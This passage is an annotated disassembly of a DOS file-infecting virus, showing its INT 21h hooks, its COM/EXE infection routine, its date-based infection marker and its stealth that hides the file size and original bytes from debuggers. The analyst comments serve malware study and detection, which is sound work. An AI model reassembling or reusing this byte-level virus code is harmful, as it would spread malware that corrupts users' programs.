;  (record size 1, 1Ch records) with function 27h. The read position
;  is ((size + 0E0F) AND FFF0) - 0DFC, i.e. four bytes into the
;  0E00h-byte body that follows the paragraph-rounded host; that is
;  where the original leading bytes of the host are kept (see 0134).
;  The bytes presumably land in the same DTA and so replace the
;  patched header the caller would otherwise see -- the DTA is not
;  changed in the visible code.
3411:053B 5A             POP	DX 
3411:053C 1F             POP	DS 
3411:053D 89D6           MOV	SI,DX 
3411:053F 0E             PUSH	CS 
3411:0540 07             POP	ES 
3411:0541 B92500         MOV	CX,0025 
3411:0544 BFB50E         MOV	DI,0EB5 
3411:0547 F3             REPZ	
3411:0548 A4             MOVSB	 
3411:0549 BFB50E         MOV	DI,0EB5 
3411:054C 0E             PUSH	CS 
3411:054D 1F             POP	DS 
;  FCB copy: +10h/+12h = file size, +21h/+23h = random record number,
;  +0Eh = record size.
3411:054E 8B5512         MOV	DX,[DI+12] 
3411:0551 8B4510         MOV	AX,[DI+10] 
3411:0554 050F0E         ADD	AX,0E0F 
3411:0557 83D200         ADC	DX,+00 
3411:055A 25F0FF         AND	AX,FFF0 
3411:055D 895512         MOV	[DI+12],DX 
3411:0560 894510         MOV	[DI+10],AX 
3411:0563 2DFC0D         SUB	AX,0DFC 
3411:0566 83DA00         SBB	DX,+00 
3411:0569 895523         MOV	[DI+23],DX 
3411:056C 894521         MOV	[DI+21],AX 
3411:056F B91C00         MOV	CX,001C 
3411:0572 C7450E0100     MOV    Word Ptr [DI+0E],0001
3411:0577 B427           MOV    AH,27           ; Random block read
3411:0579 89FA           MOV	DX,DI 
3411:057B E8D3FB         CALL	0151 
3411:057E E930FF         JMP    04B1
;  I N T 2 1 / AH = 23 -- Get file size
;  The caller's FCB (DS:DX, 25h bytes) is copied to CS:0EB5 and that
;  copy is opened and closed through the original handler to obtain
;  the size and date. If the date marker is absent the call is passed
;  through untouched (05D2 -> 044E).
3411:0581 0E             PUSH	CS 
3411:0582 07             POP	ES 
3411:0583 BFB50E         MOV	DI,0EB5 
3411:0586 B92500         MOV	CX,0025 
3411:0589 89D6           MOV	SI,DX 
3411:058B F3             REPZ	
3411:058C A4             MOVSB	 
3411:058D 1E             PUSH	DS 
3411:058E 52             PUSH	DX 
3411:058F 0E             PUSH	CS 
3411:0590 1F             POP	DS 
3411:0591 B40F           MOV    AH,0F           ; open file with FCB
3411:0593 BAB50E         MOV	DX,0EB5 
3411:0596 E8B8FB         CALL   0151
3411:0599 B410           MOV    AH,10           ; close file with FCB
3411:059B E8B3FB         CALL   0151
;  0ECA = copy+15h (high byte of the date); bit 7 is the marker.
;  The POPs that follow do not alter the flags tested by JZ; they
;  leave DS:SI pointing at the caller's FCB.
3411:059E F606CA0E80     TEST	Byte Ptr [0ECA],80 
3411:05A3 5E             POP	SI 
3411:05A4 1F             POP	DS 
3411:05A5 742B           JZ	05D2 
;  Marked file: take the size from copy+10h (0EC5), subtract 0E00h,
;  divide by the record size at copy+0Eh (0EC3) rounding up, and write
;  the record count to the caller's FCB at +21h/+23h. DOS is not
;  called for the caller's own FCB on this path.
3411:05A7 2EC41EC50E     LES	BX,CS:[0EC5] 
3411:05AC 8CC0           MOV	AX,ES 
3411:05AE 81EB000E       SUB    BX,0E00         ; Length of virus
3411:05B2 1D0000         SBB	AX,0000 
3411:05B5 33D2           XOR	DX,DX 
3411:05B7 2E8B0EC30E     MOV	CX,CS:[0EC3] 
3411:05BC 49             DEC	CX 
3411:05BD 01CB           ADD	BX,CX 
3411:05BF 150000         ADC	AX,0000 
3411:05C2 41             INC	CX 
3411:05C3 F7F1           DIV	CX 
3411:05C5 894423         MOV	[SI+23],AX 
3411:05C8 92             XCHG	AX,DX 
3411:05C9 93             XCHG	AX,BX 
3411:05CA F7F1           DIV	CX 
3411:05CC 894421         MOV	[SI+21],AX 
3411:05CF E9DFFE         JMP	04B1 
3411:05D2 E979FE         JMP    044E
;  I N T 2 1 / AH = 3D -- Open file
;  MACKEREL2, PIKE3 and MACKEREL3 are outside this excerpt. From the
;  visible use: PIKE3 returns carry set for names that are left alone,
;  and MACKEREL3 returns a handle in BX or FFFF on failure. Any of
;  these conditions, or CS:[0EA2] = 0, sends the call to the
;  pass-through path.
3411:05D5 E86C04         CALL   0A44            ; MACKEREL2
3411:05D8 E81504         CALL   09F0            ; PIKE3 -- process filename
3411:05DB 7239           JB	0616 
3411:05DD 2E803EA20E00   CMP	Byte Ptr CS:[0EA2],00 
3411:05E3 7431           JZ	0616 
3411:05E5 E86904         CALL   0A51            ; MACKEREL3
3411:05E8 83FBFF         CMP	BX,-01 
3411:05EB 7429           JZ	0616 
;  Record the handle in a 14h-entry table at CS:0E52: the first zero
;  word is located with REPNZ SCASW, the slot receives the word from
;  CS:[0EA3] and the word 28h bytes further on receives the handle.
;  CS:[0EA2] is decremented here and incremented on close (063B), so
;  it behaves as a count of free slots. CS:[0EA3] is presumably an
;  owner id set by MACKEREL2 (it is loaded into DS and used with PSP
;  offsets 000A/000C at 083A-0848) -- confirm there.
3411:05ED 2EFE0EA20E     DEC	Byte Ptr CS:[0EA2] 
3411:05F2 0E             PUSH	CS 
3411:05F3 07             POP	ES 
3411:05F4 B91400         MOV	CX,0014 
3411:05F7 BF520E         MOV	DI,0E52 
3411:05FA 33C0           XOR	AX,AX 
3411:05FC F2             REPNZ	
3411:05FD AF             SCASW	 
3411:05FE 2EA1A30E       MOV	AX,CS:[0EA3] 
3411:0602 268945FE       MOV	ES:[DI-02],AX 
3411:0606 26895D26       MOV	ES:[DI+26],BX 
;  Return the handle as the caller's AX (saved-register slot [BP-04])
;  and clear carry in the FLAGS copy that the exit path writes back.
3411:060A 895EFC         MOV	[BP-04],BX 
3411:060D 2E8026B30EFE   AND	Byte Ptr CS:[0EB3],FE 
3411:0613 E99BFE         JMP	04B1 
3411:0616 E935FE         JMP    044E
;  I N T 2 1 / AH = 3E -- Close file or device
;  Looks the handle (BX) up in the table filled by the open handler:
;  a slot must hold the word from CS:[0EA3] and the parallel entry
;  28h bytes further on must equal BX; the JNZ at 0630 resumes the
;  scan when only the first matches. Handles that are not in the
;  table are passed through.
3411:0619 0E             PUSH	CS 
3411:061A 07             POP	ES 
3411:061B E82604         CALL   0A44            ; MACKEREL2
3411:061E B91400         MOV	CX,0014 
3411:0621 2EA1A30E       MOV	AX,CS:[0EA3] 
3411:0625 BF520E         MOV	DI,0E52 
3411:0628 F2             REPNZ	
3411:0629 AF             SCASW	 
3411:062A 7516           JNZ	0642 
3411:062C 263B5D26       CMP	BX,ES:[DI+26] 
3411:0630 75F6           JNZ	0628 
;  Tracked handle: free the slot and hand over to the routine at 0852
;  (labelled FISH in this listing), which examines the file and ends
;  by issuing function 3E itself at 0916. The exit through 060D
;  clears carry in the FLAGS copy.
;  Analysis note: files that passed the name filter at open time are
;  processed when they are closed, so activity is tied to ordinary
;  open/close traffic, not only to program execution.
3411:0632 26C745FE0000   MOV	Word Ptr ES:[DI-02],0000 
3411:0638 E81702         CALL	0852 
3411:063B 2EFE06A20E     INC	Byte Ptr CS:[0EA2] 
3411:0640 EBCB           JMP	060D 
3411:0642 E909FE         JMP    044E
;  Get DTA address
;  Issues function 2F through the original handler (DTA returned in
;  ES:BX) and moves the segment into DS.
;  Out: DS:BX = current DTA. ES is preserved; AH is overwritten.
3411:0645 B42F           MOV    AH,2F           ; Get DTA
3411:0647 06             PUSH	ES 
3411:0648 E806FB         CALL	0151 
3411:064B 06             PUSH	ES 
3411:064C 1F             POP	DS 
3411:064D 07             POP	ES 
3411:064E C3             RET
;  I N T 2 1 / AH = 4B - LAUNCH
;  AL = 0 (load and execute) continues at 0656; every other
;  subfunction goes to 07AC, which handles only AL = 1.
3411:064F 0AC0           OR     AL,AL
3411:0651 7403           JZ     0656            ; Load + execute
3411:0653 E95601         JMP    07AC            ; Just load -- SOLE2
;  INT21, Function 4B00, Load + Execute
;  The request is not forwarded as issued. The code copies the
;  parameter block and file name into its own segment, asks DOS to
;  load the program without running it (4B01), inspects the loaded
;  image, and then starts it itself.
;  Copy 0Eh bytes of the caller's parameter block (ES:BX) to CS:0EF1
;  and 50h bytes of the file name (DS:DX) to CS:0F07.
3411:0656 1E             PUSH	DS 
3411:0657 52             PUSH	DX 
3411:0658 2E8C06260E     MOV	CS:[0E26],ES 
3411:065D 2E891E240E     MOV	CS:[0E24],BX 
3411:0662 2EC536240E     LDS	SI,CS:[0E24] 
3411:0667 B90E00         MOV	CX,000E 
3411:066A BFF10E         MOV	DI,0EF1 
3411:066D 0E             PUSH	CS 
3411:066E 07             POP	ES 
3411:066F F3             REPZ	
3411:0670 A4             MOVSB	 
3411:0671 5E             POP	SI 
3411:0672 1F             POP	DS 
3411:0673 B95000         MOV	CX,0050 
3411:0676 BF070F         MOV	DI,0F07 
3411:0679 F3             REPZ	
3411:067A A4             MOVSB	 
3411:067B BBFFFF         MOV	BX,FFFF 
;  Restore the caller's registers, then unwind the interrupt frame:
;  old BP, return IP -> [0EE6], return CS -> [0EE8], FLAGS -> [0EB3].
3411:067E E8EEFA         CALL   016F            ; COD2 - restore registers
3411:0681 5D             POP	BP 
3411:0682 2E8F06E60E     POP	CS:[0EE6] 
3411:0687 2E8F06E80E     POP	CS:[0EE8] 
3411:068C 2E8F06B30E     POP	CS:[0EB3] 
;  Issue 4B01 with ES:BX = CS:0EF1 through the original handler.
;  On success DOS fills in SS:SP at block+0Eh (0EFF/0F01) and CS:IP
;  at block+12h (0F03/0F05).
3411:0691 0E             PUSH	CS 
3411:0692 B8014B         MOV    AX,4B01         ; Load but don't execute
3411:0695 07             POP    ES              ; Segment of parameter block
3411:0696 9C             PUSHF	 
3411:0697 BBF10E         MOV    BX,0EF1         ; Offset of parameter block
3411:069A 2EFF1E350E     CALL   FAR CS:[0E35]   ; Previous INT21 handler
3411:069F 7320           JNB	06C1 
;  Load failed: set carry in the FLAGS copy, rebuild the interrupt
;  frame (FLAGS, CS, IP, BP), reload the caller's ES:BX and leave
;  through the common exit.
3411:06A1 2E830EB30E01   OR	Word Ptr CS:[0EB3],+01 
3411:06A7 2EFF36B30E     PUSH	CS:[0EB3] 
3411:06AC 2EFF36E80E     PUSH	CS:[0EE8] 
3411:06B1 2EFF36E60E     PUSH	CS:[0EE6] 
3411:06B6 55             PUSH	BP 
3411:06B7 2EC41E240E     LES	BX,CS:[0E24] 
3411:06BC 89E5           MOV	BP,SP 
3411:06BE E991FD         JMP	0452 
;  Load succeeded: release every handle-table slot (CS:0E52, 14h
;  words) that holds the word from CS:[0EA3], incrementing the
;  free-slot count each time. MACKEREL2 is outside this excerpt.
3411:06C1 E88003         CALL   0A44            ; MACKEREL2
3411:06C4 0E             PUSH	CS 
3411:06C5 07             POP	ES 
3411:06C6 B91400         MOV	CX,0014 
3411:06C9 BF520E         MOV	DI,0E52 
3411:06CC 2EA1A30E       MOV	AX,CS:[0EA3] 
3411:06D0 F2             REPNZ	
3411:06D1 AF             SCASW	 
3411:06D2 750D           JNZ	06E1 
3411:06D4 26C745FE0000   MOV	Word Ptr ES:[DI-02],0000 
3411:06DA 2EFE06A20E     INC	Byte Ptr CS:[0EA2] 
3411:06DF EBEB           JMP    06CC
;  DS:SI = entry CS:IP of the loaded image. IP = 0001 is the EXE
;  marker (the header IP is set to 1 at 08A9; body offset 1 holds the
;  JMP seen at 0131). In that case DS is the body segment, and the
;  entry point and stack are replaced by the host's original values
;  kept at body offsets 12h/14h/18h/1Ah, relocated by PSP + 10h.
3411:06E1 2EC536030F     LDS    SI,CS:[0F03]
3411:06E6 83FE01         CMP	SI,+01 
3411:06E9 7534           JNZ	071F 
3411:06EB 8B161A00       MOV	DX,[001A] 
3411:06EF 83C210         ADD	DX,+10 
3411:06F2 B451           MOV    AH,51           ; Get PSP segment
3411:06F4 E85AFA         CALL	0151 
3411:06F7 03D3           ADD	DX,BX 
3411:06F9 2E8916050F     MOV	CS:[0F05],DX 
3411:06FE FF361800       PUSH	[0018] 
3411:0702 2E8F06030F     POP	CS:[0F03] 
3411:0707 031E1200       ADD	BX,[0012] 
3411:070B 83C310         ADD	BX,+10 
3411:070E 2E891E010F     MOV	CS:[0F01],BX 
3411:0713 FF361400       PUSH	[0014] 
3411:0717 2E8F06FF0E     POP	CS:[0EFF] 
3411:071C E92800         JMP    0747
;  Otherwise test the three words at the entry point for the COM
;  marker word0 + word1 + NOT(word2) = 0. A match goes to SOLE1
;  (0790), which puts the original bytes back in the loaded image.
3411:071F 8B04           MOV	AX,[SI] 
3411:0721 034402         ADD	AX,[SI+02] 
3411:0724 53             PUSH	BX 
3411:0725 8B5C04         MOV	BX,[SI+04] 
3411:0728 F7D3           NOT	BX 
3411:072A 01D8           ADD	AX,BX 
3411:072C 5B             POP	BX 
3411:072D 7461           JZ     0790            ; SOLE1
;  No marker: the copied file name (CS:0F07) is passed through PIKE3
;  and MACKEREL3 and the file is handed to the routine at 0852, with
;  CS:[0EEF] raised for the duration of the call. Both helpers are
;  outside this excerpt and their results are not tested here.
3411:072F 0E             PUSH	CS 
3411:0730 1F             POP	DS 
3411:0731 BA070F         MOV	DX,0F07 
3411:0734 E8B902         CALL   09F0            ; PIKE3 - process filename
3411:0737 E81703         CALL   0A51            ; MACKEREL3
3411:073A 2EFE06EF0E     INC	Byte Ptr CS:[0EEF] 
3411:073F E81001         CALL	0852 
3411:0742 2EFE0EEF0E     DEC	Byte Ptr CS:[0EEF] 
;  Start the loaded program by hand. The handler patch is swapped
;  back in, DS = ES = PSP (function 51), and the original caller's
;  return IP:CS is written to PSP:000A/000C and to the INT 22h
;  vector so termination returns to the caller of EXEC. The FLAGS
;  copy is popped, SS:SP and CS:IP are taken from 0EFF-0F05.
;  NOTE(review): the word popped into AX at 077C was left on the stack
;  by code outside this handler; its meaning is not visible here.
3411:0747 B451           MOV    AH,51           ; Get PSP segment
3411:0749 E805FA         CALL	0151 
3411:074C E85DFA         CALL   01AC            ; SHARK2 - save regs internal
3411:074F E880FA         CALL   01D2            ; SHARK3
3411:0752 E832FA         CALL   0187            ; SHARK1 - rest regs internal
3411:0755 8EDB           MOV	DS,BX 
3411:0757 8EC3           MOV	ES,BX 
3411:0759 2EFF36B30E     PUSH	CS:[0EB3] 
3411:075E 2EFF36E80E     PUSH	CS:[0EE8] 
3411:0763 2EFF36E60E     PUSH	CS:[0EE6] 
3411:0768 8F060A00       POP	[000A] 
3411:076C 8F060C00       POP	[000C] 
3411:0770 1E             PUSH	DS 
3411:0771 B022           MOV    AL,22           ; DOS terminate
3411:0773 C5160A00       LDS	DX,[000A] 
3411:0777 E880FA         CALL   01FA            ; CARP2 - set interrupt
3411:077A 1F             POP	DS 
3411:077B 9D             POPF	 
3411:077C 58             POP	AX 
3411:077D 2E8B26FF0E     MOV	SP,CS:[0EFF] 
3411:0782 2E8E16010F     MOV	SS,CS:[0F01] 
3411:0787 2EFF2E030F     JMP    FAR CS:[0F03]
                        DB      'SOLE'
;  SOLE1 -- clean a marked COM image in memory. DS:SI is the entry
;  point, whose first byte is the near JMP. BX = its 16-bit
;  displacement, so SI + BX + F239h (i.e. JMP target - 0DCAh) addresses
;  the saved original bytes (0134 in this sample, with SI = 0100 and
;  BX = 0DFB). Three words are copied back over the entry point.
3411:0790 8B5C01         MOV    BX,[SI+01] 
3411:0793 8B8039F2       MOV	AX,[BX+SI+F239] 
3411:0797 8904           MOV	[SI],AX 
3411:0799 8B803BF2       MOV	AX,[BX+SI+F23B] 
3411:079D 894402         MOV	[SI+02],AX 
3411:07A0 8B803DF2       MOV	AX,[BX+SI+F23D] 
3411:07A4 894404         MOV	[SI+04],AX 
;  0B81 is outside this excerpt; the annotation below is the original
;  author's description of it.
3411:07A7 E8D703         CALL   0B81            ; Print msg & halt if 1991
3411:07AA EB9B           JMP	0747 
;  INT 21, FUNCTION 4B01, Load but do not execute.
;  This is the call a debugger uses to load a program. DOS performs
;  the load, then the returned image and parameter block are edited so
;  that a marked program looks like the original host.
;  Analysis note: while this code is resident, a marked file loaded
;  for inspection shows the host's entry point and first bytes, so
;  samples need to be examined from a clean boot or from raw disk
;  reads.
3411:07AC 3C01           CMP    AL,01           ; We only know 4B01
3411:07AE 7403           JZ	07B3 
3411:07B0 E99BFC         JMP	044E 
;  Carry is pre-set in the FLAGS copy and cleared at 07D7 only if the
;  load succeeds.
3411:07B3 2E830EB30E01   OR	Word Ptr CS:[0EB3],+01 
3411:07B9 2E8C06260E     MOV    CS:[0E26],ES    ; save param block segment
3411:07BE 2E891E240E     MOV    CS:[0E24],BX    ; save param block offset
3411:07C3 E8A9F9         CALL   016F            ; COD2 - restore registers
3411:07C6 E888F9         CALL   0151            ; Call DOS to load
3411:07C9 E890F9         CALL   015C            ; COD1 - save registers
;  None of COD1, LES or LDS changes the flags, so the JB below still
;  tests the carry returned by DOS. DS:SI = entry CS:IP (block+12h).
3411:07CC 2EC41E240E     LES    BX,CS:[0E24]    ; restore param block
3411:07D1 26C57712       LDS	SI,ES:[BX+12] 
3411:07D5 7274           JB	084B 
3411:07D7 2E8026B30EFE   AND	Byte Ptr CS:[0EB3],FE 
3411:07DD 83FE01         CMP	SI,+01 
3411:07E0 7429           JZ	080B 
;  COM case: test the three-word marker at the entry point and, when
;  it matches, copy the saved original words back (same arithmetic as
;  SOLE1 at 0790).
3411:07E2 8B04           MOV	AX,[SI] 
3411:07E4 034402         ADD	AX,[SI+02] 
3411:07E7 53             PUSH	BX 
3411:07E8 8B5C04         MOV	BX,[SI+04] 
3411:07EB F7D3           NOT	BX 
3411:07ED 01D8           ADD	AX,BX 
3411:07EF 5B             POP	BX 
3411:07F0 7545           JNZ	0837 
3411:07F2 8B5C01         MOV	BX,[SI+01] 
3411:07F5 8B8039F2       MOV	AX,[BX+SI+F239] 
3411:07F9 8904           MOV	[SI],AX 
3411:07FB 8B803BF2       MOV	AX,[BX+SI+F23B] 
3411:07FF 894402         MOV	[SI+02],AX 
3411:0802 8B803DF2       MOV	AX,[BX+SI+F23D] 
3411:0806 894404         MOV	[SI+04],AX 
3411:0809 EB2C           JMP    0837
;  EXE case (entry IP = 1): rewrite the caller's parameter block with
;  the host's original CS:IP (+14h/+12h) and SS:SP (+10h/+0Eh) taken
;  from body offsets 1Ah/18h/12h/14h, relocating the segments by
;  CS:[0EA3] + 10h. CS:[0EA3] is presumably the PSP segment obtained
;  by MACKEREL2 (outside this excerpt) -- confirm there.
3411:080B 8B161A00       MOV	DX,[001A] 
3411:080F E83202         CALL   0A44            ; MACKEREL2
3411:0812 2E8B0EA30E     MOV	CX,CS:[0EA3] 
3411:0817 83C110         ADD	CX,+10 
3411:081A 01CA           ADD	DX,CX 
3411:081C 26895714       MOV	ES:[BX+14],DX 
3411:0820 A11800         MOV	AX,[0018] 
3411:0823 26894712       MOV	ES:[BX+12],AX 
3411:0827 A11200         MOV	AX,[0012] 
3411:082A 03C1           ADD	AX,CX 
3411:082C 26894710       MOV	ES:[BX+10],AX 
3411:0830 A11400         MOV	AX,[0014] 
3411:0833 2689470E       MOV	ES:[BX+0E],AX 
;  Store the caller's return IP ([BP+02]) and CS ([BP+04]) at offsets
;  000A/000C of the segment in CS:[0EA3].
3411:0837 E80A02         CALL   0A44            ; MACKEREL2
3411:083A 2E8E1EA30E     MOV	DS,CS:[0EA3] 
3411:083F 8B4602         MOV	AX,[BP+02] 
3411:0842 A30A00         MOV	[000A],AX 
3411:0845 8B4604         MOV	AX,[BP+04] 
3411:0848 A30C00         MOV	[000C],AX 
3411:084B E963FC         JMP    04B1
                         DB      'FISH'
;  Infection routine (entry 0852). Calls 0D00 and 0934, then patches the
;  1Ch-byte header image at 0E00 as EXE or COM, writes it and the body
;  through PIKE1, closes the file and restores its attributes.
;  Presumably BX holds the handle opened by the routine at 0A51 -- confirm.
3411:0852 E8AB04         CALL	0D00 
3411:0855 E8DC00         CALL   0934
;  EXE or COM program?  Flag at [0020]: 1 = EXE, 0 = COM.
3411:0858 C606200001     MOV    Byte Ptr [0020],01      ; COM/EXE flag
3411:085D 813E000E4D5A   CMP    Word Ptr [0E00],'ZM'
3411:0863 740E           JZ	0873 
3411:0865 813E000E5A4D   CMP    Word Ptr [0E00],'MZ'
3411:086B 7406           JZ     0873
;  Not an EXE signature: the flag goes 1 -> 0, so this JZ is always taken.
3411:086D FE0E2000       DEC	Byte Ptr [0020] 
3411:0871 7458           JZ     08CB
;  EXE path. [0E04] is the header's page count. CX is presumably still
;  0010 from 0934, so SHL/MUL turns pages into paragraphs. If that size
;  plus 0200 is below the real size in SI, the file is skipped.
3411:0873 A1040E         MOV	AX,[0E04] 
3411:0876 D1E1           SHL	CX,1 
3411:0878 F7E1           MUL	CX 
3411:087A 050002         ADD	AX,0200 
3411:087D 39F0           CMP	AX,SI 
3411:087F 7248           JB     08C9
;  Skip when header words 0A and 0C (min/max allocation) are both zero.
3411:0881 A10A0E         MOV	AX,[0E0A] 
3411:0884 0B060C0E       OR	AX,[0E0C] 
3411:0888 743F           JZ	08C9 
;  Recompute page count and last-page byte count from the file size
;  stored at [0EAB]:[0EA9]; a non-zero remainder adds one page.
3411:088A 8B16AB0E       MOV	DX,[0EAB] 
3411:088E B90002         MOV	CX,0200 
3411:0891 A1A90E         MOV	AX,[0EA9] 
3411:0894 F7F1           DIV	CX 
3411:0896 0BD2           OR	DX,DX 
3411:0898 7401           JZ	089B 
3411:089A 40             INC	AX 
3411:089B 8916020E       MOV	[0E02],DX 
3411:089F A3040E         MOV	[0E04],AX 
;  Header word 14 (initial IP) equal to 1 is treated as "already infected".
3411:08A2 833E140E01     CMP	Word Ptr [0E14],+01 
3411:08A7 746D           JZ	0916 
;  New entry point: IP = 1, CS = SS = file paragraphs - header paragraphs,
;  SP = 0E00, page count + 7 (7 * 200h = 0E00h bytes added).
3411:08A9 C706140E0100   MOV	Word Ptr [0E14],0001 
3411:08AF 8BC6           MOV	AX,SI 
3411:08B1 2B06080E       SUB	AX,[0E08] 
3411:08B5 A3160E         MOV	[0E16],AX 
3411:08B8 8306040E07     ADD	Word Ptr [0E04],+07 
3411:08BD C706100E000E   MOV	Word Ptr [0E10],0E00 
3411:08C3 A30E0E         MOV	[0E0E],AX 
3411:08C6 E8CD00         CALL   0996            ; PIKE1
3411:08C9 EB4B           JMP	0916 
;  COM path. Files of 0F00 paragraphs or more are left alone.
3411:08CB 81FE000F       CMP	SI,0F00 
3411:08CF 7345           JNB	0916 
;  Copy the first three words to [0004]..[0008] while summing
;  word0 + word1 + NOT(word2) into DX. DX is the remainder left by the
;  DIV in 0934, which is 0 because the dividend was a multiple of 16.
;  A zero sum matches the marker written at 0905-0910 below, so the file
;  is treated as already infected. Useful as a scanner check.
3411:08D1 A1000E         MOV	AX,[0E00] 
3411:08D4 A30400         MOV	[0004],AX 
3411:08D7 01C2           ADD	DX,AX 
3411:08D9 A1020E         MOV	AX,[0E02] 
3411:08DC A30600         MOV	[0006],AX 
3411:08DF 01C2           ADD	DX,AX 
3411:08E1 A1040E         MOV	AX,[0E04] 
3411:08E4 A30800         MOV	[0008],AX 
3411:08E7 F7D0           NOT	AX 
3411:08E9 01C2           ADD	DX,AX 
3411:08EB 7429           JZ	0916 
;  [0EF2] holds the attributes saved at 0A7C; bit 04 (system) means skip.
3411:08ED A1F20E         MOV	AX,[0EF2] 
3411:08F0 2404           AND	AL,04 
3411:08F2 7522           JNZ	0916 
;  Place JMP at beginning of newly infected file.
;  Displacement = SI * 10h (file size rounded up to a paragraph) + 0DCB.
3411:08F4 B1E9           MOV    CL,E9           ; JMP instruction
3411:08F6 B81000         MOV	AX,0010 
3411:08F9 880E000E       MOV	[0E00],CL 
3411:08FD F7E6           MUL	SI 
3411:08FF 05CB0D         ADD	AX,0DCB 
3411:0902 A3010E         MOV    [0E01],AX       ; JMP target
3411:0905 A1000E         MOV	AX,[0E00] 
3411:0908 0306020E       ADD	AX,[0E02] 
3411:090C F7D8           NEG    AX              ; word2 = NOT(-(word0 + word1)):
3411:090E F7D0           NOT	AX 
3411:0910 A3040E         MOV	[0E04],AX 
;  The three words above form the marker tested at 08D1-08EB.
3411:0913 E88000         CALL   0996            ; PIKE1
;  Common exit: close the handle, put the saved attributes back on the
;  path at [0EF6]:[0EF4], then 0D80 restores the INT 13 and INT 24 vectors.
3411:0916 B43E           MOV    AH,3E           ; Close file
3411:0918 E836F8         CALL	0151 
3411:091B 2E8B0EF20E     MOV	CX,CS:[0EF2] 
3411:0920 B80143         MOV    AX,4301         ; Set file attributes
3411:0923 2E8B16F40E     MOV	DX,CS:[0EF4] 
3411:0928 2E8E1EF60E     MOV	DS,CS:[0EF6] 
3411:092D E821F8         CALL	0151 
3411:0930 E84D04         CALL	0D80 
3411:0933 C3             RET
;  0934 -- Read header and size of the open file.
;  Out: [0E29]/[0E2B] = file time/date, 1Ch header bytes at DS:0E00 and a
;       second copy at DS:0004, [0EAB]:[0EA9] = file size,
;       SI = size rounded up to a paragraph, in paragraphs,
;       DI = size minus rounded size (low word; zero or negative).
;  DS is set to CS here. All DOS calls go through 0151.
3411:0934 0E             PUSH	CS 
3411:0935 B80057         MOV	AX,5700 
3411:0938 1F             POP	DS 
3411:0939 E815F8         CALL   0151            ; Get file date+time
3411:093C 890E290E       MOV    [0E29],CX       ; File time stash
3411:0940 B80042         MOV    AX,4200         ; Move file pointer
3411:0943 89162B0E       MOV    [0E2B],DX       ; File date stash
3411:0947 33C9           XOR	CX,CX 
3411:0949 33D2           XOR	DX,DX 
3411:094B E803F8         CALL	0151 
;  First read: working copy of the header, patched later by the caller.
3411:094E B43F           MOV    AH,3F           ; Read bytes
3411:0950 BA000E         MOV	DX,0E00 
3411:0953 B11C           MOV    CL,1C           ; ExeHeader size?
3411:0955 E8F9F7         CALL	0151 
3411:0958 33C9           XOR	CX,CX 
3411:095A B80042         MOV    AX,4200         ; Move file pointer
3411:095D 33D2           XOR	DX,DX 
3411:095F E8EFF7         CALL	0151 
;  Second read: copy of the original bytes kept at offset 0004.
3411:0962 B11C           MOV    CL,1C           ; ExeHeader size?
3411:0964 B43F           MOV    AH,3F           ; Read bytes
3411:0966 BA0400         MOV	DX,0004 
3411:0969 E8E5F7         CALL	0151 
3411:096C 33C9           XOR	CX,CX 
3411:096E B80242         MOV    AX,4202         ; Move file pointer from end
3411:0971 8BD1           MOV	DX,CX 
3411:0973 E8DBF7         CALL	0151 
;  DX:AX = file size. Round up to a multiple of 10h and divide by 10h.
3411:0976 8916AB0E       MOV	[0EAB],DX 
3411:097A A3A90E         MOV	[0EA9],AX 
3411:097D 8BF8           MOV	DI,AX 
3411:097F 050F00         ADD	AX,000F 
3411:0982 83D200         ADC	DX,+00 
3411:0985 25F0FF         AND	AX,FFF0 
3411:0988 29C7           SUB	DI,AX 
3411:098A B91000         MOV	CX,0010 
3411:098D F7F1           DIV	CX 
3411:098F 8BF0           MOV	SI,AX 
3411:0991 C3             RET
                        DB      'PIKE'
;  PIKE1 -- Write the patched header and append the body.
;  In:  SI, DI as left by 0934; header image at 0E00; presumably BX = handle.
;  Writes 1Ch bytes at offset 0, seeks to SI * 10h, then writes 0E00 + DI
;  bytes from offset 0 through 0EA9. The file grows by exactly 0E00h bytes.
;  Finally the saved time and date are written back, with the date marker.
3411:0996 33C9           XOR    CX,CX 
3411:0998 B80042         MOV    AX,4200         ; Move file pointer
3411:099B 8BD1           MOV	DX,CX 
3411:099D E8B1F7         CALL	0151 
3411:09A0 B11C           MOV	CL,1C 
3411:09A2 B440           MOV    AH,40           ; Write to file
3411:09A4 BA000E         MOV	DX,0E00 
3411:09A7 E8A7F7         CALL	0151 
;  DX:AX = SI * 10h becomes the CX:DX seek offset.
3411:09AA B81000         MOV	AX,0010 
3411:09AD F7E6           MUL	SI 
3411:09AF 8BCA           MOV	CX,DX 
3411:09B1 8BD0           MOV	DX,AX 
3411:09B3 B80042         MOV    AX,4200         ; Move file pointer
3411:09B6 E898F7         CALL	0151 
3411:09B9 B9000E         MOV	CX,0E00 
3411:09BC 33D2           XOR	DX,DX 
3411:09BE 01F9           ADD	CX,DI 
3411:09C0 B440           MOV    AH,40
;  [0E33] = 1 makes the decryptor at 0EFE return here instead of going to
;  TROUT. 0EA9 XORs the body, issues the write set up above, and decrypts.
3411:09C2 2EC606330E01   MOV	Byte Ptr CS:[0E33],01 
3411:09C8 53             PUSH	BX 
3411:09C9 E8DD04         CALL	0EA9 
3411:09CC 5B             POP	BX 
3411:09CD 8B0E290E       MOV    CX,[0E29]       ; File time
3411:09D1 B80157         MOV    AX,5701         ; Set file date+time
3411:09D4 8B162B0E       MOV    DX,[0E2B]       ; File date stash
;  Infection marker: bit 7 of the date's high byte. If it is not already
;  set, C8 is added to that byte, which adds 100 to the DOS year field.
3411:09D8 F6C680         TEST	DH,80 
3411:09DB 7503           JNZ	09E0 
3411:09DD 80C6C8         ADD    DH,C8           ; year field + 100
3411:09E0 E86EF7         CALL	0151 
3411:09E3 C3             RET	 
;  PIKE2 -- Second entry into the extension test of PIKE3.
;  Sets ES = DS and DI = DX + 0D, then joins PIKE3 at 0A10, so the bytes
;  at DX+09 .. DX+0B are tested as the extension.
;  NOTE(review): the record layout behind DX is not visible here -- confirm.
3411:09E4 E8C5F7         CALL   01AC            ; SHARK2 - save regs internal
3411:09E7 89D7           MOV	DI,DX 
3411:09E9 83C70D         ADD	DI,+0D 
3411:09EC 1E             PUSH	DS 

3411:09ED 07             POP	ES 
3411:09EE EB20           JMP    0A10
;  PIKE3  -- process filename
;  In:  DS:DX = filename, terminated by a zero byte.
;  Out: carry clear if the extension sums to COM or EXE, carry set otherwise.
;       CS:[0E28] = drive code (0 = none given, else letter AND 1F).
;       CS:[0020] = 0 for COM, 1 otherwise.
;  Registers are saved by SHARK2 on entry and restored by SHARK1 on exit.
